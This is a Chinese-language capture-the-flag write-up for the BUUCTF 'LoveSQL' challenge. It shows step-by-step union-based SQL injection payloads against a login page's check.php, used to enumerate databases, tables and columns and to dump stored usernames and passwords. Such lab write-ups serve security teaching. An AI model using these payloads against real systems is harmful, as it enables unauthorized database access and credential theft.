题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]LoveSQL
![BUUCTF:[极客大挑战 2019]LoveSQL_数据库](https://s2.51cto.com/images/blog/202306/19154700_649007f451d4187092.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]LoveSQL_php_02](https://s2.51cto.com/images/blog/202306/19154700_649007f4837f243567.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
万能密码登陆成功了,确定存在注入点
order by判断字段数量
/check.php?username=mochu7'order by 3%23&password=admin![BUUCTF:[极客大挑战 2019]LoveSQL_数据库_03](https://s2.51cto.com/images/blog/202306/19154700_649007f4aa86443588.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]LoveSQL_数据库_04](https://s2.51cto.com/images/blog/202306/19154700_649007f4c6e5d52219.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
确定字段数量为3,查看回显点
/check.php?username=mochu7'union select 1,2,3%23&password=admin![BUUCTF:[极客大挑战 2019]LoveSQL_字段_05](https://s2.51cto.com/images/blog/202306/19154700_649007f4e97f598993.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
查询当前数据库和所有数据库
/check.php?username=mochu7'union select 1,database(),group_concat(schema_name) from information_schema.schemata%23&password=admin![BUUCTF:[极客大挑战 2019]LoveSQL_字段_06](https://s2.51cto.com/images/blog/202306/19154701_649007f53f5ab21298.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
information_schema
mysql
performance_schema
test
geek查询geek数据库中的表
/check.php?username=mochu7'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=admin![BUUCTF:[极客大挑战 2019]LoveSQL_数据库_07](https://s2.51cto.com/images/blog/202306/19154701_649007f582f3945023.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
geekuser
l0ve1ysq1查询geek.l0ve1ysq1表下的字段名
/check.php?username=mochu7'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=admin![BUUCTF:[极客大挑战 2019]LoveSQL_字段_08](https://s2.51cto.com/images/blog/202306/19154701_649007f5d0f0913086.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
id
username
password查询字段所有内容
/check.php?username=mochu7'union select 1,2,group_concat(id,'---',username,'---',password) from geek.l0ve1ysq1%23&password=admin![BUUCTF:[极客大挑战 2019]LoveSQL_字段_09](https://s2.51cto.com/images/blog/202306/19154702_649007f631d4934474.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
